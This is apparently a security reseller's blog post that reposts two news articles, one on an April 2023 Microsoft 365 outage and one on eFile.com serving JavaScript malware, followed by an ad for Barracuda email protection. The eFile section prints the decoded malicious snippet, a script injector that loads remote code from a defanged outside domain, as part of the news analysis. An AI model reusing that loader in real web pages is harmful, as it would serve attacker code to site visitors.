Microsoft 365 outage blocks access to web apps and services

By Sergiu Gatlan April 20, 2023 10:24 AM

My Comments:
Why do you folks put up with Microsoft?? If you want to safe guard your clients information at least use MspPortal/Barracuda product called Total Mail Protection, save it off the Microsoft Network wholesale pricing is very inexpensive but call for pricing

Microsoft is investigating an ongoing outage blocking customers worldwide from accessing and using web apps like Excel Online and online services.

The list of affected services includes Microsoft 365 suite, Exchange Online, SharePoint Online, Yammer Enterprise, Planner, Microsoft Teams, Microsoft 365 for the web, and Project for the web.

According to reports, customers are experiencing problems when trying to sign into their accounts and will see that no web apps are available once in.

“We’re investigating access issues with Microsoft 365 Online apps and the Teams admin center. Further information can be found under OO544150 within the Microsoft 365 admin center,” the company tweeted earlier today.

“Users may be intermittently unable to view or access web apps in Microsoft 365. We’re reviewing service monitoring telemetry to isolate the root cause and develop a remediation plan,” the admin center incident report says.

In some cases, a banner displayed at the top of the screen asks “new” users to reach out to their IT department to help with the issue.

“New to Microsoft 365? This is your Microsoft 365 home page where you can see and access all of your apps. If it’s empty, it could be that your user license was very recently assigned to you,” the notification reads.

“Wait 10 minutes and refresh this page. If you still don’t see any apps, contact your IT department. They can help you get up and running.”

We’re investigating access issues with Microsoft 365 Online apps and the Teams admin center. Further information can be found under OO544150 within the Microsoft 365 admin center.
— Microsoft 365 Status (@MSFT365Status) April 20, 2023

According to the latest updates provided by Microsoft in the admin center, the out was caused by caching infrastructure performing below acceptable performance thresholds and leading to timeout exceptions.

“Analysis of diagnostic data has identified an unusually high number of timeout exceptions within our caching and Azure Active Directory (AAD) infrastructure. We’re working to isolate the cause of these exceptions whilst identifying steps to remediate impact,” Microsoft said.

Until this Microsoft 365 outage is addressed, users can access applications through direct URLs. Microsoft provides the following examples:

Microsoft 365 Admin Center – admin.microsoft.com
Outlook – outlook.office.com
Microsoft Teams – teams.microsoft.com
Word Online – microsoft365.com/launch/word
Excel Online – microsoft365.com/launch/excel

Another outage took down multiple Microsoft 365 services in January after a router IP address change caused packet forwarding issues between routers in Microsoft’s Wide Area Network (WAN).

Services affected by the January 2023 outage included Microsoft Teams, Exchange Online, Outlook, SharePoint Online, OneDrive, the Microsoft 365 Admin Center, Microsoft Graph, Microsoft Intune, and several Microsoft Defender products.

Update April 20, 13:23 EDT: Microsoft is investigating high CPU usage impacting infrastructure processing back-end navigation feature APIs.

Until the outage is resolved, customers can access the Microsoft 365 admin center via http://admin.microsoft.com.

We’re investigating high CPU utilization on the components which process back-end navigation feature APIs. Further details are under MO544165 in the admin center. As the admin center currently does not appear within the Waffle, use https://t.co/EdTvCQNMih to access the service.
— Microsoft 365 Status (@MSFT365Status) April 20, 2023

Link (https://www.bleepingcomputer.com/news/microsoft/microsoft-365-outage-blocks-access-to-web-apps-and-services/)

Roy Miehe | MspPortal Partners Inc. | Ceo/President
Security Software Distributor: Bitdefender , Barracuda, Axcient
“Where Service and Technical Skills Count”

 

IRS-authorized eFile.com tax return software caught serving JS malware

By Ax Sharma April 4, 2023 05:00 AM

If it was not already bad enough with the Banking issues going on

eFile.com, an IRS-authorized e-file software service provider used by many for filing their tax returns, has been caught serving JavaScript malware.

Security researchers state the malicious JavaScript file existed on eFile.com website for weeks. BleepingComputer has been able to confirm the existence of the malicious JavaScript file in question, at the time.

Note, this security incident specifically concerns eFile.com and not IRS’ e-file infrastructure or identical sounding domains.
Just in time for tax season

eFile.com was caught serving malware, as spotted by multiple users and researchers. The malicious JavaScript file in question is called ‘popper.js’:
eFile.com serving malicious popper.js file
The ‘popper.js’ file used by eFile.com across its webpages contains malware
​​​(BleepingComputer)

The development comes at a crucial time when U.S. taxpayers are wrapping up their IRS tax returns before the April 18th due date.

The highlighted code above is base64-encoded with its decoded version shown below. The code attempts to load JavaScript returned by infoamanewonliag[.]online:
s=document.createElement(‘script’);
document.body.appendChild(s);
s.src=’//www.infoamanewonliag[.]online/update/index.php?’+Math.random();

The use of Math.random() at the end is likely to prevent caching and load a fresh copy of the malware—should the threat actor make any changes to it, every time eFile.com is visited. At the time of writing, the endpoint was no longer up.

BleepingComputer can confirm, the malicious JavaScript file ‘popper.js’ was being loaded by almost every page of eFile.com, at least up until April 1st.
eFile.com pages serving popper.js
eFile.com pages serving poppers.js (BleepingComputer)

As of today, the file is no longer seen serving the malicious code.
Website ‘hijacked’ over 2 weeks ago

On March 17th, a Reddit thread surfaced where multiple eFile.com users suspected the website was “hijacked.”

At the time, the website showed an SSL error message that, some suspected, was fake and indicative of a hack:

Article (https://www.bleepingcomputer.com/news/security/irs-authorized-efilecom-tax-return-software-caught-serving-js-malware/)

Roy Miehe | MspPortal Partners Inc. | Ceo/President
Security Software Distributor: Bitdefender , Barracuda, Axcient
“Where Service and Technical Skills Count”

MspPortal Partners Steps up with a Major Purchase

Most everybody know MspPortal Partners supplies security software at wholesale price’s
We now have added Total Email Protection with Barracuda
This allows us to offer 3 different flavors at wholesale pricing.
1) Advanced Email Protection-
Combine email gateway and artificial intelligence to block threats Ensure protection against all 13 email threat types. Automatically remediate post-delivery email threats.

2) Complete Mail Protection-
Includes everything from Advanced. Backs up all O365 and Gsuite components off the O365 and Gsuite Servers

3) Total Mail Protection-
Includes everything from Premium. Protect and restore your Microsoft 365 data. Protect your Microsoft 365 applications from lateral attacks. Plus Phisline-Sentinal

You will be provided as normal up to 3rd level support which puts MspPortal Partners on top of the distributors in the Security Software Arena.
We have 24x7x365 support
Working hours are M-F 7:30am- 5pm MST/Arizona
Coming soon this month will be bundle pricing Mail Filtering (Barracuda), RMM (Barracuda), Antivirus/Antimalware (Bitdefender) this will ensure all Partners and there Customers are protected at all times.

Roy Miehe | MspPortal Partners Inc. | Ceo/President
Security Software Distributor: Bitdefender , Barracuda, Axcient
“Where Service and Technical Skills Count”